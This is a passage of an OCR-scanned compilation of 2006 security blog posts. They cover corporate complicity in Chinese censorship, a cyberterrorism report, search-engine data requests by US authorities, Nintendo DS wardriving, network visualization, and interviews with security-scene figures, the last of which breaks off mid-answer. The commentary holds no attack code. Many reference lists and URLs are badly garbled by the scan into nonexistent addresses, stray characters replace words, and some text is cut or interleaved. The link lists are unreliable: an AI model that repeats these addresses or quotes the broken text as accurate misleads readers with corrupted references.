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-Net access history, web posts and email 


[7]Nortel, developed network traffic analysis system dedicated to catching political 
opposition (Falun Gong) 


Motorola, competed with Nokia to provide location tracking 


Microsoft, [8]censors words in blog software 


[9]Yahoo, actively collaborates in tracking state political opponents via their email, search 
and chat usage 
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Google, censors prohibited sites/queries from search- Alters news results to favor 
nationalized news(Still, Google recently [10]declined the request for access for its databases, 
compared to the rest of search engines, Yahoo!, MSN) 


The worst in this case, from my point of view the experience gained by the companies, in the 
wrong direction. 


| once [11]mentioned how businesses don’t have a business choice but to comply, the thing 
is now the Western media has already started [12]seeking accountability and higher levels of 


moral. 


Basically, 
profitability shouldn’t be an objective,when encouraging the further 


development of such "regimes". | guess, | still don’t have a content 
filtering agreement with the Chinese government, but | don’t even want 


to..:) 
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The entire idea of censorship in here is to 

avoid events in direct confrontation with current "reality", and | think 

the it isn’t wise, [13]keeping it quiet is even worse. The bad thing is that even IBM used to do 
[14]"business" 

with the wrong party | guess . What is greed and profit maximization, 

what is business and morale? Words we remember on Xmas’s day for sure! 


More info on the topic can also be found at : 


[15]International Campaign Against Mass Surveillance 


[16]Balancing surveillance 


[17]Justifying the cost of digital video surveillance 


[18]Protecting Personal Data in Camera Surveillance 
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[19]Society-and-Surveillance study journal 


Technorati tags : 


[20]security,[21]privacy,[22]free speech,[23]censorship,[24]surveillance,[25]1984 


 epe://photostPlogger con/blogger/1939/1770/1600/s1w1611. git 
| http://www. acn,uiue,du/signil/talks/Crvellian. pif 

_fetp:/ /wwe. acm. inc .du/etgns1/ndex. shea 

. http://www. acm.uiuc.edu/sigmil/talks. shtml 


ttp://www.acm.uiuc.edu/sigmil/projects.shtm 


ttp://yaleglobal.yale.edu/display.article?id=5928 


. http://www. fofg.org/news/news_story.php?doc_id=81 

ttp://www.asiamedia.ucla. edu/article.asp?parentid=37346 
ttps://web.archive.org/web/20101016193525/http: //www.usatoday .com/news/opinion/editorials/2005-06-19-our- 
10. 


. http: //ddanchev. blogspot .com/2006/01/china-biggest-black-spot-on-internets.htm 


12. http://www.axcessnews.com/modules/wfsection/article.php?articleid=760 


. http: //www.financialmirror.com/more_news.php?id=297 


14, hetp://news. con.con/2008-1082-269167 tn 
cep: //eer icone org/TOANGt pa 
16, http: //vev.securitytocus.cou/columists/368 
"cep: //wev. soon ne, con/read/090105/rei_3626 hea 
. http: //www.surveillance-and-society.org/articles2/284/29/protecting .pdf 
9 ery TI, 
_hetp://eechnorata.con/tag/ security 
TR eecreseett co eae ieee 
22, http: //eechnorat’.con/tag/tree+speed 
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http: //technorati.com/tag/censorship 
http: //technorati.com/tag/surveillance 
http: //technorati.com/tag/1984 
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2.1.26 Cyberterrorism - recent developments (2006-01-23 17:57) 


I’ve once blogged about why you shouldn’t [1]stereotype when it comes to Cyberterrorism, 
and going through the most recent and well researched report on"[2]Terrorism Capabilities for 
Cyberattack : Overview and Policy Issues"! 

came across great similarities to what | posted. | think cyberterrorism 

shouldn’t be just perceived as shutting down a stock exchange, or 

slowing it down, the irony here is that it could actually [3]happen for "good" on a certain occa- 
sions :) 


Going 

back to the report, it’s a very recent overview of cyberterrorism, and 
the way it’s perceived. Flawed or not I'll leave up to you to decide. 
What made me an impression anyway? 


- [4]CIA’s 

2005 "Silent Horizon" to practice defending against a simulated 
widespread cyberattack directed against the United States. | really 
don’t think frontal attack are of any interest, or are they? 


- [5]Stolen credit cards were used in the terrorist attacks in Bali. There have also been other 
[6]cases, of exactly the same, using cyber activities for funding real world crime and 
terrorism. 


- How [7]sensitive information on a future Army command and control system was stolen from 
an unclassified system by at least [8]reportedly, 

Chinese hackers. Unclasiffied doesn’t necessarily mean someone wasn’t 

having a false sense of security on a .mil domain | guess. 


- The [9]U.S Elite Military Hacking Crew, 
the so called Joint Functional Component Command for Network Warfare 
(JFCCNW) | feel every military forces have or should have these. 
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The report also highlights that the Internet is now a [10]prime recruiting tool 
for insurgents in Iraq. Insurgents have created many Arabic-language 

Web sites that are said to contain coded plans for new attacks. Some 
reportedly give advice on how to build and operate weapons, and how to 
pass through border checkpoints . 


- Other news articles report that a [11]younger generation of terrorists 
and extremists, such as those behind the July 2005 bombings in London, 
are learning new technical skills to help them avoid detection by law 
enforcement computer technology 


Which is exactly what I’ve mentioned in my post on [12]Cyberterrorism. | feel, 
communication, and coordination, besides [13]research is the ultimate goal here. 


The only thing that make made me sort of a bad impression was how the only major 
innovation mentioned is [14]quantum cryptography, and [15]steganography 

mentioned just twice. | think that this isn’t entirely the case, and 

breaking cryptography doesn’t necessarily have to come in form of 

directly attacking the algorithm itself. That happens to be impossible 

sometimes, but the first time when | came across the fact that the AU [16]government can 
use spyware on criminals with the idea too obtain keys, or whatsoever, it makes such 

[17 ]issues irrelevant. 


On the other hand, the way the Internet provides "them" with more opportunities, the more 
their [18]traceability [19]improves, or at least give clues to a certain extend. 


Technorati tags : 


[20]security,[21]information security,[22]cyberterrorism,[23]Terrorism,[24]al qaeda 


1. http: //ddanchev. blogspot .com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 
2. http: //www.opencrs .com/document /RL33123/ 
3. http: //edition.cnn.com/2006/BUSINESS/01/19/tse. changes. reut/ 


> 


http: //www.wired.com/news/politics/0, 1283, 67644,00.html?tw=rss.TOP 


5. http://www. lasvegassun.com/sunbin/stories/text/2005/apr/13/518595803.htm 
6. http://www.securityfocus.com/brief/42 
7. bttp://www.time.com/time/nation/printout/0, 8816, 1098371,00.htm 
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8 
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10. http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2005/07/10/CURIEL . TMP 

11 

12. 
13. http://en.wikipedia.org/wiki/Open_source_intelligence 

14 

15. 

16. http://it.slashdot.org/article.p1l?sid=04/12/13/1925240&tid=172&tid=1 

17. http://www.techworld.com/news/index.cfm?newsID=4727kprinterfriendly=1 


18. http://www.cl.cam.ac.uk/~rnc1/The_Limits_of_Traceability.htm 


19. http://www.cse.ucsd.edu/users/tkohno/papers/PDF/KoBrC1l05PDF-lowres . pdf 


21, 
22. 
23, 


24. http://technorati.com/tag/al+qaed 


2.1.27 Still worry about your search history and BigBrother? (2006-01-23 17:59) 


== PATRIOT 
[1] SEARCH [2]The Patriot Search, recently started "helping" any govern- 


ment by making your search activity "public". Its search syntax terrorist:true *keyword*, and 
terrorist:false *keyword*, gives everyone the opportunity to be honest :) Why did the idea start 
at the [3]first place? 


Because "[4]only 4 out of 5 search engines allowed the government to see "private" user data". 
Though, a distinction between [5]private searches VS personally identifiable searches should 
be made as well. 
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What’s going to happen in the future? [6]Search engines regulation, [7]P3P, or [8]stock 
market losses due to an [9]initiative whose requirements | feel were totally wrong from the 
very beginning? 


Consider going though [10]David Berlind’s comments as well! 


Technorati tags : 


[11]google,[12]bush,[13]privacy,[14]search engine 
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. http://blog.outer-court.com/patriot/ 


_ http: //www.mercurynews . con/mld/mer curynews/news/breaking_news/13682492. htm 
. https: //web. archive. org/web/20101016193525/http : //blog. searchenginewatch. com/blog/060123-074811 
. http: //islandia. law. yale.edu/isp/regulatingsearch html 

/ 

_ http: //money. cnn. com/2006/01/20/technology/google_stock/index. htm 

_ http: //www.usdoj .gov/osg/briefs/2003/3mer/2mer/2003-0218.mer .aa-html 
10. http: //blogs .zdnet . com/BTL/?p=2454 

. http: //technorati . com/tag/google 

2. http: //technorati . com/tag/bush 

13. http: //technorati . com/tag/privacy 

14. http: //technorati . com/tag/search+engine 


OMONDAUBRWHNEE 


ray 
ray 


pay 


2.1.28 Homebrew Hacking, bring your Nintendo DS! (2006-01-23 18:00) 


[1] oll ts Yesterday, Engadget [2]reported about a "WiFi sniffer" that turns 
your [3]Nintendo DS, 

into a wardriving tool and while it lacks certain features, it can 

still prove "handy", even fuel further security concerns over this [4]steadily [5]developing 
[6]trend [7]of homebrew hacking experiments. 
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[8]Removable media is a problem, but would gaming devices turn into a security threat as well? 
They can sure result in more [9]malware, and this [10]trend, among the many other, made me 
an impression in respect to the need of [11]interoperability in the upcoming future. 


Technorati tags : 


[12]security,[13]information security,[14]hacking,[15]homebrew,[16]nintendo,[17]ninte ndo 
DS 


ttps://web.archive.org/web/20101016193525/http: //photos1. blogger. com/blogger/1933/1779/1600/dswar . jpg 


ttp://www.engadget .com/2006/01/22/wifi-sniffer-turns- your-ds-into-a-wardriving-tool/ 


. http: //www.hackaday.com 
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. http: //darkfader.net/ds/ 

. http://www.psp-hacks.com/ 

. http: //www.continuitycentral.com/feature0184.htm 
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. http://packetstormsecurity .org/papers/general/malware-trends . pdf 
. http://en.wikipedia.org/wiki/Interoperabilit 


. http://technorati.com/tag/securit 


. http://technorati.com/tag/information+securit 


. http://technorati.com/tag/hacking 
. http://technorati.com/tag/homebre 
. http://technorati.com/tag/nintendo 


. http://technorati.com/tag/nintendo+D 
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2.1.29 Visualization, Intelligence and the Starlight project (2006-01-23 18:01) 


[1] Today, | came across a [2]stunning collection of complex net- 
works visualizations, that reminded of how we must first learn to visualize and than go deeper 
into [3]VR. Until, | first visited this [4]project, the [5]JAtlas of Cyberspace 

was perhaps my favorite visualization resource, rather outdated, still 

has a lot to show. 


Visualization is important for today’s greatly 

developed knowledge networks, data mining, and even information security 
or basic network management issues. But at the bottom line, who always 
has the best toys, or at least develops them? The academic world? Sort 

of, except that they need the private sector to go public, so that 

leaves the U.S military in my point of view :) and they sure do. 


[7]The Starlight - Information Visualization Technology is simply a remarkable concept that 
these [8]folks 

actually turned into a reality. It uses both structured, unstructured, 

spatial and multimedia data and provides real-time output, and if you 

also consider that the project is reportedly down several years ago, for 

me it opens up the question, who’s the successor? 
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[9] = It’s [10]national security applications and the syndication of 
data sources are so clearly visible, that reducing paper-work, platform dependence, 
[11]information sharing, and perhaps not another [12]Able Danger scenario(if one actually 
[13]happened!) is the biggest advantage of such a project. 


Going back to the "reality"(yeah sure!), in case you’ve never seen [14]ChicagoCrimes, the 
free database of crimes reported in Chicago, it’s yet another great initiative that again 
visualizes based on reports and [15]Google Maps, and you don’t need a security clearance to 
use it :) What’s else to mention, is CNET’s introduction of "[16]The Big Picture" in cooperation 
with [17]Liveplasma.com 

of course, clearly, the waves of information flow must be somehow 

filtered and there’s a clear, both, commercial, public and intelligence 

need for it. Even [18]VR [19]investments are actively taking place, a lot’s to come for sure! 


Some concepts and clips on visualization : 


[20]TouchGraph Google Browser 


[21]Real-Time and Forensic Network Data Analysis Using Animated and Coordinated 
Visualization 


[22]F-Secure’s visualization of the 1st PC virus, and [23]W32.Bagle, and you can actually see 
the [24]clip itself. 


[25]Visualization study the U.S - clip 


Technoratai tags : 


[26]security,[27]information security,[28]intelligence,[29]OSINT,[30]starlight,[31]vi 
sualization,[32]virtual reality 


https://web.archive. org/web/20101016193525im_/http://photos1.blogger .com/blogger/1933/1779/200/starlight. 
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_ieep:/ owe, viswalconplenivy con/ve/inden. cf 
| http://en. wikipedia. org/viki/Virtual_reality 

| hetp://wwy. viswalcomplerity.con/ve/about. neal 
| Fcip:/ env. cybergeography org/atiae/atiaa. taal 


https: //web.archive.org/web/20101016193525/http://photos1. blogger .com/blogger/1933/1779/1600/oinfomodel. gi 


http://starlight .pnl.gov/ 


ttp://starlight .pnl.gov/index.asp?src=team.stm 


https://web.archive. org/web/20101016193525/http://photos1 .blogger .com/blogger/1933/1779/1600/appMilitary1. 


10. 
. http: //www.govexec.com/story_page.cfm?articleid=33191&%dcn=todaysnews 
12. 
| http://www 9-Iipap. org/press/2005~11-21 letter pad 
14, 
: : .chi ime. / 
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http: //www.chicagocrime.org/map 


. http: //news.com.com/The+Big+Picture/2030-12_3-5843390.html?tag=st .bp 


17. http://liveplasma.com/ 
18. http://www.digitalglobe.com/images/intersat_pr/ 


. http: //www.prnewswire.com/cgi-bin/stories .p1?ACCT=104&STORY=/www/story/01-04-2006/0004242166%EDATE 


20. http://www. touchgraph.com/TGGoogleBrowser . htm 
21. http://www.ece.gatech.edu/research/labs/nsa/papers/drafts/iaw_vis_draft.pdf 


. http://www. f-secure. com/weblog/archives/brain-a-750. png 


. http: //www.f-secure.com/weblog/archives/f-secure_bagle-ag_visualization. jpg 


26. http://technorati.com/tag/securit 
27. http://technorati.com/tag/information+securit 
28. http: //technorati.com/tag/intelligence 


2.1.30 The Feds, Google, MSN’s reaction, and how you got "bigbrothered"? 
(2006-01-24 18:03) 


[1] There’s still a lot of buzz going on, concerning which [2]search 
engine provided what type of data to law [3]enforcement officials, and the echo effect of this 
event resulted in waves of [4Jangry end users, 

that among feeling "bigbrothered", now have yet another reason to 

switch back to Google, simple. MSN’s silent reaction to this is the 

worst thing they could do given how actively they’re trying to catch-up 
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on search traffic. What did they provide anyway? 


"Specifically, 

we produced a random sample of pages from our index and some aggregated 
query logs that listed queries and how often they occurred. Absolutely 

no personal data was involved. With this data you : 


CAN see how frequently some query terms occurred 
CANNOT look up an IP and see what they queried 


CANNOT look for users who queried for both “TERM A” and “TERM B” 


So 

picture, the following, "someone" requests his name, his friends’ 

names, physical locations giving clues on possible area and while it 

isn’t personal information(exact names, address etc.) it is personally 

identifiable one! If it happens once, it would become a habit, my point 

is that aggregating search info on [5]ECHELON’s wordlist 

is So realistic that you need a company to say NO, and evaluate the 

reactions of the others. The best thing is that I’m sure the majority of 

adult entertainment seekers don’t need to take advantage of [6]Echelon’s Trigger Words 
Generator :) 


Why you don’t need to issue a [7]subpoena to find out what’s hot in the online porn world? 


- take Google’s [8]advice into consideration, or start using [9]Overture’s keyword selector tool 


now ensure you have the most popular porn related keywords, and if in 
doubt, consult with an "insider" who would be definitely aware of what’s 
hot, and who’s to keep in mind 


- use the first 20 pages from each popular search for your sample, these get the majority of 
traffic 


- do a little research over [10]Alexa 
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to further back up your statements, and even use Google to measure the 
relative popularity of the first site that pop ups when you search for [11]porn. 


- ensure you have first consulted with traffic aggregators or [12]paid reports on who’s who 
online 


- make sure before going online, another distribution vector so to say, [13]the iPod is taken 
care of 


- envision [14]what’s to come in the future, and mostly the interest and the social implications 
of these issues 


now, come up with ways to restrict children from using these going 
beyond the usual "But of course I’m over 21 years old" terms of use 


1 } Google 


[15] .What’s to come up in the future? In one of my previous posts 
"[16]Still worry about your search history and BigBrother?" | pointed out the possibilities for 
[17]Search engines regulation and [18]P3P, but the current self regulation is simply not 
working anymore. 


Further resources on the topic can be found at : 


[19]Lorrie Cranor’s [20]Searching for Privacy : Design and Implementation of a P3P-Enabled 
Search Engine 


[21]PrivacyBird 
[22]An Analysis of P3P-Enabled Web Sites among Top-20 Search Results 
[23]Protecting Your Search Privacy: A Flowchart To Tracks You Leave Behind 


[24]Using search engines data, Google and forensics - clip 


Technorati tags : 


[25]privacy,[26]search engine,[27]google,[28]MSN,[29]surveillance,[30]porn 
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Image originally uploaded at [31]Flickr by [32]villoks 


1. hhttps://web.archive.org/web/20101016193525im_/http://photos1.blogger .com/blogger/1933/1779/200/72599367_d 


. http: //blog. searchenginewatch. com/blog/060119- 060352 

. http: //www.mercurynews .com/mld/mercurynews/13657303 .htm 

. http://blogs .msdn . com/msnsearch/archive/2006/01/20/515606. aspx 
. http://www. theregister .co.uk/2001/05/31/what_are_those_words/ 
. http://www. bugbrother . com/echelon/spookwordsgenerator . html 


ttp://i.i.com.com/cnwk.1d/pdf/ne/2006/google-doj/motion.to.compel . pdf 


. https://adwords.google.com/select/main?cmd=KeywordSandbox 
. http://inventory.overture.com/d/searchinventory/suggestion/ 
. http://www.alexa.com/ 


ttp://www.google.com/search?hl=enklr=ksa=Gk&q=/,22pichunter .com/22 


. http://www.marketresearch.com/ 


. http://www.foxnews.com/story/0, 2933, 174828, 00. htm 


. http://www.mindbranch.com/products/R399- 0158. htm 


https://web.archive. org/web/20101016193525/http: //photos1 .blogger . com/blogger/1933/1779/1600/google_P3P_ 
privacy.0.jpg 


16. http://ddanchev. blogspot .com/2006/01/still-worry-about-your-search-history.htm 
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17. http://islandia.law.yale.edu/isp/regulatingsearch.htm 
18. http://www. p3ptoolbox.org/ 
19. https: //web.archive.org/web/20101016193525/http: //lorrie.cranor.org 
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20. http://lorrie.cranor.org/pubs/pets04. pdf 

21. https: //web. archive. org/web/20101016193525/http: //www.privacybird.com/ 
22. http://lorrie.cranor.org/pubs/www06 .htm 

23. http://blog.searchenginewatch.com/blog/060123- 112156 

24. http://media2.foxnews.com/111305/tech_google_111305_300.wm 
25. http://technorati.com/tag/privac 

26. http://technorati.com/tag/searcht+tengine 

27. http://technorati.com/tag/google 

28. http://technorati.com/tag/MS 

29. http://technorati.com/tag/surveillance 

30. http://technorati.com/tag/por 

31. http://flickr.com/ 

32. http://flickr.com/photos/villoks/ 


2.1.31 Security Interviews 2004/2005 - Part 1 (2006-01-26 07:22) 


I’ve decided to compile a list of all the interviews | have been taking for the [1]Asta’s Security 
Newsletter (feel free to opt-in), with the idea to provide you with the opinions of 22 

folks(two anonymous ones are excluded as perhaps they shouldn’t have 

been taken at the first place, and a Xmas issue without an interview) 

that | have had the chance to talk to. | hope you will enjoy the 

diversity of the their background and the topics covered. 
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Enjoy! 


Go 
though [2]Part 2 and [3]Part 3 as well! 


1. Proge - [4]http://www.progenic.com/ - 2003 


2. Jason Scott - [5]http://www.textfiles.com/ - 2003 


106 


24. 


22. 


. Kevin Townsend - [6]http://www.I|tsecurity.com/ - 2003 

. Richard Menta - [7]http://www.bankinfosecurity.com[8] 2004 
. MrYowler - [9]http://www.cyberarmy.net/ - 2004 

. Prozac - [10]http://www.astalavista.com/ - 2004 

. Candid Wuest - [11 ]http://www.trojan.ch/ - 2004 

. Anthony Aykut - [12 ]http://www.frame4.com/ - 2004 
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Interview with Proge, Founder of Progenic [27 |http://www.progenic.com/ 


Astalavista : To those who still don’t know of Progenic.com, give us a brief introduction of the 
whole idea and its history? 


Proge 

: Basically it all started in back in 98, we just made software for the 

fun of it and stuck it up on a webpage, mostly pretty simple stuff.It 

was a fun time but as the scene grew, things got a little out of hand, 

and when FakeSurf (the first automated surfing tool) was released we had 
legal threats from Alladvantage, lost our sponsorship that was paying 

for the bandwidth and were flooded with people wanting nothing more than 
a quick buck.I think that’s when everyone decided enough was enough, 
and we took the site behind closed doors, | left the toplist up on 
Progenic.com because it’s a scene | came from and | don’t want to see it 
die.At the moment I’m 


working on more constructive things like DownSeek.com, it’s more satisfying to create 
something that helps people. 


Astalavista 
: As being on the Scene for such a long time, what is your opinion on 
today’s Security threats home and corporate users face every day? 


Proge 

: There are usually two reasons why you become a target, automated 
software scanning your system for known exploits that you should have 
patched, or you’ve made yourself a target.If someone wants to break into 
your system then unless you have a dedication to security, that window 
between an exploit and a patch is going to get you.Even if you stay on 
top 


of things, it can still be a battle. According to Microsoft ‘the 

only truly secure computer is the one buried in concrete, with the power 
turned off and the network cable cut’ and you probably run their 
operating system. 
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Astalavista : Is Security through Education the perfect model for any organization? 


Proge 

: Definitely!I’m still amazed that there are programmers and sys-amins 
out there, who think functionality first, security second or not at 

all.You need to understand hacking to understand Security, you know the 
reasons why you lock your door at night, why you set an alarm, but do 
you know why you have a firewall or an intrusion detection system, or 
did it just sound like a good idea when you got a glossy leaflet warning 
you about ‘hackers’ and asking your money? You can’t just install a 
product and forget about Security, but that’s what the industry tries to 
sell.Security is a constant threat and it isn’t game over until you 

lose. 


Astalavista : How real you think is the threat of CyberTerrorism? 


Proge : With people like we have in power it gets more real.Like | said, if you make yourself a 


target, you’ve got a problem. 


Astalavista : Is BigBrother really watching us, and what’s the actual meaning of the word 


‘privacy’ nowadays ? 


Proge 

: A good question, they’re definitely watching us but to what degree, 
who knows.It doesn’t hurt to have a healthy paranoia. There’re two sides 
to the privacy argument really.Either you’re worried that 
government/business is overstepping the mark and intruding on your 
personal life for their own benefit, or you’ve got something to hide. 
Unfortunately privacy is being marketed at those with something to hide, 
you've seen the ads, cheating on your wife? Grooming underage kids? 
Erase your history, don’t get caught etc. It’s ironic that there are more 
ethics in a scene that is largely banded a threat to Security than 

there are in government and business. 


Astalavista : Thanks for your time, Proge. 
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Proge : You're welcome! 


Interview with Jason Scott, Founder of TextFiles.com [28]http://www.TextFiles.com/ 


Astalavista : How was the idea of TextFiles.com born? 


Jason 

: TEXTFILES.COM was born because one day in 1998 | wondered what had 
ever happened to an old BBS | used to call (it was called Sherwood 

Forest Il). Since the WWW had been around for a good 5 years, | figured 
out there would be a page up with information about it, and | could even 
download a few of the old textfiles | used to read back in those days 

(the BBS was up from about 1983 to 1985). To my shock, there was nothing 
about Sherwood Forest II anywhere, and nothing about ANY of the BBSes 
of my youth. So then | went off and registered the most easy-to-remember 
name | could find, textfiles.com, and started putting up my old 

collection from Floppies. This gave me about 3,000 files, which | used 

to attract other peoples’ collections and find more on my own, until the 
curren number, which is well past 60,000. 


Astalavista 

: There’s a huge amount of illegal and destructive information(bomb 
howto guides, drugs howtos) spreading around the Internet these 
days.Some of these files can be found at TextFiles.com as well, don’t 
you think that accessing such information is rather dangerous and could 
endanger someone? 


Jason : Well, the question 
makes it sound like this is a recent event, the availability of 
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information that, if implemented, could cause damage or other sorts of 
trouble. This has always been the case; if you want, we can go back to 
the days of the TAP newsletter (and the later 2600 magazine) where all 
sorts of "dangerous" information was being printed. We can go back many 
years before that. 


This may sound like a copout, but | don’t 

really buy into the concept of "dangerous information". At a fundamental 
level, it is someone saying "I am looking at this, and | have decided 

you should not see it. So don’t look. I’ve made my decision." And | find 
that loathesome in that it gives 


someone enormous arbitrary power. 
This argument applies for the concepts of Obscenity and 
Governmentally-Classified information, as well. 


Sometimes people 
bring up the concept of children into the argument and my immediate 
reaction is not very pleasant. Parents protect; be a parent. 


If 

somebody wants to hurt somebody else, then information files are not the 
big limiting factor to them doing it; they’ll just pick up a match and 

set your house on fire, or buy a gun and shoot you or someone you really 
like. Censorship, as you might imagine, is not big on my list of things 


that improve the quality of life. 


Astalavista 

: Nowadays Information could be considered the most expensive "good", 
what’s your attitude towards the opinion that the access to certain 
Information would have to be a paid one? 


Information is a very 

funny thing. It can be quantified to some extent, and some amount of 
control can be issued on its transfer and storage. But the fact is that 
we, aS a race, have been spending a lot of time making information 
easier and easier to spread. Printing press, book, flyer, radio, 

records, tapes, CDs, DVDs, internet, Peer to Peer... faster and faster. 
It is possible to know on the other side of the world what a child 


at 


looked like at the moment it was born, a mere few seconds later. When 
Americans elected the president in the 1800s, they might not know who 

had won for weeks. Many people might have never seen a photograph of the 
man who ran 


their country. They would almost certainly never hear him speak. 


Charging 

for information is everyone’s right. More power to them if they can 
make a buck. But that’s not what I’m talking about. I’ve seen kids with a 
hundred textfiles trying to sell access to them for $5. If they’re able 
to lure in suckers to pay that, then they have a talent. When you’re in 
the cinema, the same soda that cost something like fifty cents or a 
quarter, at the local store it will cost you two or three dollars. Are 

you paying for the soda or for the ability to have a soda in that 
location? Similarly, | don’t think you’re paying for the information on a 
site that charges, you’re paying a fee because you didn’t know any 
other way to get this information. 


There will always be a market 

for people with the ability to take a large amount of information and 
distill it for others (we called them "gatekeepers" when | took Mass 
Communications in college). The only difference is that now anyone can 
be a gatekeeper, and people can choose to forget them and get the 
information themselves. So now it’s an option, which is a great 
situation indeed. 


I’ve always been insistent about not charging 

for access to textfiles.com and not putting advertisements up on the 
site. I’m going to continue to do that as long as | can, which | expect 
will be for the rest of my life. 


Astalavista : Share your thoughts about the Dmitry Skylarov case. 


Jason 

: While this is not the first time that something like the Skylarov 

fiasco has occurred, | am glad that in this particular instance, a lot 

of press and a lot of attention was landed on what was being done here. 
Adobe realized within a short time that they’d made a serious mistake, 
and | hope they will continue to be reminded of how rotten and 
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self-serving they were in the whole event. | certainly hope the company 
name ‘Adobe’ will stays in the minds of everyone with it for a long time 
to come. 


That said, I’m glad everything worked out OK for him. 
Nobody deserves to be held up in a country away from their family 
because some software publisher has decided they’re evil. 


America 

has occasionally taken poor shortcuts through very evil laws trying to 

fix problems and make them worse. The "Separate but Equal" rulings in 
regard to Segregation and the indictment of anti-war protesters during 
World War | for something akin to Treason now have a modern cousin the 
DMCA and its equivalent laws, the Mini-DMCAs being passed by states. | 
think we will look back at this time with embarassment and whitewashing 
what went on. 


Astalavista : How do you see the future of Internet, having in mind the Government’s 


invasion in the user’s privacy, and on the other hand, the commercialization of the Net? 


Jason 

: Mankind has been driven from probably day one to make things better, 
cheaper, and quicker because that’s what will bring them success and 
fortune. People talk about television being this vast wasteland of 
uselessness, yet using something like my TiVO I can now bounce among my 
thousands of daily television programs and listen to events and people 
that just 10 or 20 years ago, there would be no room on television for. 

For all the Internet’s abutments with the law, the fact is that it’s 

still being adopted as fast as it can, the technology driving it is 

cheaper and cheaper (I have a connection to my house that costs me $200 
that would have cost upwards of $10,000 in 1993) and nobody is really 
able to say "This Internet Thing Needs to Go" and not get laughed at. 


It 

took me years and years to collect the textfiles on textfiles.com. If 
people go to torrent.textfiles.com, they can download the entire 
collection in as little as a few hours. People are now trading 
half-gigabyte to multi-gigabyte files like they used to trade 
multi-megabyte MP3 files just a few years ago. 
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| really don’t 
have any fear about it being crushed. Too many people know the secret of 
how wonderful this all is. It’s a great time to be alive. 


Astalavista : Thanks for the chat! 


Interview with Kevin Townsend, Founder and Editor of [29]http://ITSecurity.com 


Originally taken for [30]HiComm Magazine 


Astalavista : How did you get interested in the Information Security field? 


Kevin 

: More by accident than design. | had been a freelance IT journalist 

for many years - then we had a child that couldn’t sleep. We went 

through many, many months of averaging just a couple of hours sleep each 
night - it played havoc with my freelancing; couldn’t concentrate, 

couldn’t write, couldn’t meet deadlines... In the end | gave up and gota 
proper job. It was actually the first thing that came along, and was 
marketing manager with a software company that just happened to develop 
security software. But from then on | was hooked. Infosec is one of the 
most fascinating areas there is: good versus bad, light versus dark - 

the perpetual battlefield at an intellectual level without any blood. 


Astalavista 
: Share your viewpoint on the constantly increasing malware problem 
issue, are we going to see another ILOVEYOU disaster in the near future? 
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Kevin 

: I’m sure there will be more malware all the time - and sooner or 
later, one of them will be dramatic and disastrous. My biggest fear for 
the Internet, however, is government intervention. Governments need 
control, and they fear lack of control. The weaker they are, the more 
they need to control - and the world has some mighty weak people in high 
office ATM. The Internet is a threat to their control. They need to 
control the Internet in order to control people. Consider this: we calla 
category of malware ‘viruses’. We do so because they behave like 
biological viruses. If we continue that analogy, then the ’system’ they 
attack (the Internet) equates to the human body. 


Now, if a virus attacks a human, we react in several different ways. The ‘traditional’ method 


(it 

isn’t traditional at all; it’s very recent) is to attack the virus with 
ever-stronger antibiotics, or even the surgeon’s knife. But more and 
more of us are coming to the conclusion that this sort of ’quick fix’ is 
no fix at all - all it does is weaken the immune system and encourage 
the virus to grow into ever stronger variants. The real solution is to 
strengthen the immune system so that the viruses are tackled and 
destroyed without causing any damage. 


This analogy should be 

passed back to computer viruses. If governments over-react with 
increasing penalties and draconian actions (the surgeon’s knife), we 
will weaken the Internet until it is just a pale shadow of the vibrant 
organism it should be - and we still won’t ever get rid of the viruses. 
The real solution is to strengthen the Internet, not to emasculate it. 


Astalavista : As far as ITSecurity is concerned, what are the major 


threats companies and home users face on a daily basis and how can they be prevented? 


Kevin 

: Well, by now you won't be surprised to know that | consider 
over-regulation to be the major threat for both business and home users. 
We are all rapidly transferring our personas to the cyber world, 

whether that is our business persona or individual persona. Once that is 
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complete, whoever controls the cyber world will control all of us. 

Smart card ID cards will be able to track everything that everybody does 
- in fact; we won’t be able to do anything without the cards. And if a 
domain name is withdrawn, individuals or entire companies will 
effectively disappear overnight. This is a far greater threat than 

another Lovebug. 


Astalavista : In today’s world of terror, how real do you think the danger of 


Cyberterrorism is, like stock exchanges going down, corporate networks completely 
devastated by terrorist groups? 


Kevin 

: [think that the danger exists, but is over-hyped. Attack analyses 

show that a large percentage of attacks against western (that is, 
American) utilities and banks come from a very small number of countries 
well known to be largely anti-American. | cannot believe that this is 

all done without their government knowledge - so the danger is very 

real. But just as there are some very clever people attacking systems, 

so there are some very, very clever people defending them. 


Astalavista : What’s your personal opinion on the US government’s effort to monitor 


its citizens’ Internet activities, in order to protect them from potential terrorist attacks? 


Kevin 

: It isn’t, of course, just the US Government. | actually believe that 
the UK is already further down the line on this. Governments need to 
strike a balance between defending their people and enslaving their 
people. A recent poll of American CSOs by CSO magazine shows 


that 31 % of US business leaders believe that the USA is on the way to becoming a police 
state. 


| 

think that most governments have failed to find the right balance - and 
| think the UK government has already put everything in place for a 
police state in the UK. | forget the precise words, but the comment that 
‘those who would give up freedom for security actually deserve 


neither’ is so very true. 
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Interview with Richard Menta [31]http://BankInfoSecurity.com/ 


Astalavista : Hi Richard, | would appreciate if you introduce yourself and the web site you 
represent, namely BankinfoSecurity.com 


Rich 

: My name is Richard Menta. | work for an information security 
consulting firm in NJ called Icons, Inc where | serve as a consultant 
and as the editor of BankInfoSecurity.com. 


About 90 % of the 

Icons’s clients are banks and credit unions. These institutions are 

heavily regulated regarding information security, yet despite this fact 

we found many of our clients needed much more education on the concepts 
of information security and the added threats and risks presented by 
technology. BankInfoSecurity.com was developed to help fill this need by 
aggregating the latest news and information, covering both the 

technical and regulatory aspects of InfoSec. 


Astalavista 

: What’s the major difference between the security threats the 
financial sector is dealing with, compared with the general security 
ones? 


Rich : Privacy is the biggest issues with 

regards to financial institutions. They are mandated by the 
Gramm-Leach-Bliley Act (GLBA) to protect what is called the non-public 
personal information (NPPI) of their customers. The biggest security 
threat comes from intruders looking to garner NPPI to facilitate 

identity theft. As the relationship of financial institutions with their 
customers is highly based on trust and mass identity theft undermines 
that trust, it is a critical issue to control the theft of customer 
information. 
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Astalavista : E-business wouldn’t 

be profitable without E-commerce, what do you think are the major 
security problems E-shops face nowadays, how aware of the information 
security issue are the managers behind them, and what do you think can 
make a significant change in their mode of thinking? 


Rich 

: The biggest security issue is the lack of awareness as a whole. A 

good information security strategy takes significant effort and 

financial commitment, but many senior managers are unaware of the full 
breadth of what information security covers. There is a lot to grasp too 
as information security is an every evolving discipline that has to 

rapidly change with the 


